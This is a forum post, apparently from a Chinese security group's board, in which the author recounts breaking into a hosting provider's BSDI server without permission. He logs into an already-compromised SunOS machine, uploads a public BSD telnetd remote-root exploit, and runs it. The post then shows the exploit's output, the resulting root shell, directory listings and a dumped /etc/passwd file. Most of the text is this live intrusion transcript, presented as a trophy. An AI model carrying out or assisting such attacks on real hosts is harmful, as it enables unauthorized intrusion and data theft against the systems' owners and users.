Author: jwm3337 [jwm3337] Forum user
While hanging around hack.co.za today, I saw that the exploit for the *bsd telnetd vulnerability from a few days ago was already out, so I downloaded it right away. Then I suddenly remembered that XX (self-styled "China's No. 1 IDC service provider") also runs BSDI as its system, so I went to test it.

telnet xxx.xxx.xxx.xxx   // telnet to a compromised box first~
SunOS 5.8   // jealous?!
login: xxx
Password:
Login incorrect   // typed the wrong password!
login: zym
Password:
Last login: Sun Jul 29 19:37:19 from 61.140.253.101
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
$   // ok~well~

FTP the exploit up! Then telnet to the XX host:

$ telnet 211.99.xxx.xx
Trying 211.99.xxx.xx...
Connected to 211.99.xxx.xx.
Escape character is '^]'.
BSDI BSD/OS 4.1 (cb-k6) (ttyp2)
login:

Oh~ so it's BSDI BSD/OS 4.1! Let's begin!

$ ./test 211.99.xxx.xx
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.

check: PASSED, using 16mb mode

############################################################

ok baby, times are rough, we send 16mb traffic to the remote
telnet daemon process, it will spill badly. but then, there is no
other way, sorry...

## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 0
##
## the percentage is more realistic than the dots ;)

percent |--------------------------------------------------------| ETA |
 79.01% |................................................. | 00:01:05 |

command: /od job!!! It worked!

command: id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff)
set
PS1=#
OPTIND=1
PS2=》
PATH=/bin:/usr/bin
IFS=
cd /
ls
.base-4.1 .profile .sentinel README.CIVILINK a admin admin_nfs amd bin
bkroot bkusr boot bsd cdrom dev disk2 etc include lib linux login.core
login_krb-or-pwd.core man mnt nsr popper.core root sbin sco shlib sys
telnetd.core tftpboot tmp usr var
cd usr
cd home
cd admin
ls
.bash_history .cshrc @LongLink DBI-1.13 DBI-1_13_tar Data-Dumper-2.09
Data-Dumper-2_09_tar Msql-Mysql-modules-1.2209 Msql-Mysql-modules-1_2209_tar
ServerType WRONG apache_1.3.12 apache_1.3.12.tar bash.core batch_mkvirt.pl
bigfile bin cgi.tar client.tar
cnhack.org.tar   // how did this get here?!
controlpanelV1.2-normal controlpanelV1.2-normal.tar dbi.tar disk_info
disk_sd0 env.cgi fornew fp40.bsdi.tar frontpage fsck.core gmake-3.74.tar
hacked htst index.html install install_1.1c_release.tar install_log ji
legato libmysqlclient.a lizs local make-3.74 man_perlfunc mkvirt.log
mysql-3.22.32 mysql-3_22_32_tar old_command php-4.0.1pl2 php-4.0.1pl2.tar
putfl renew.tar script script2 script_sd1 script_sd2 script_sd3
sendmail.up suexec tar-1.13 tar-1.13.tar test trans update_mail users
cat /etc/passwd
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
oracle:x:1001:200::/home/oracle:/bin/sh
ue:x:1001:200::/home/oracle:/bin/sh
cuijia:x:1002:10::/home/cuijia:/bin/sh
ephone:x:1003:10::/usr/ephone:/bin/csh
www:x:1004:10::/oracle/www:/bin/sh
zym:x:1005:10::/home/zym:/bin/sh
zzyok:x:1006:10::/home/oracle:/bin/sh
…………
exit
read remote: Interrupted system call
$
Original post, posted: 09/21 13:02
All rights reserved by the 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.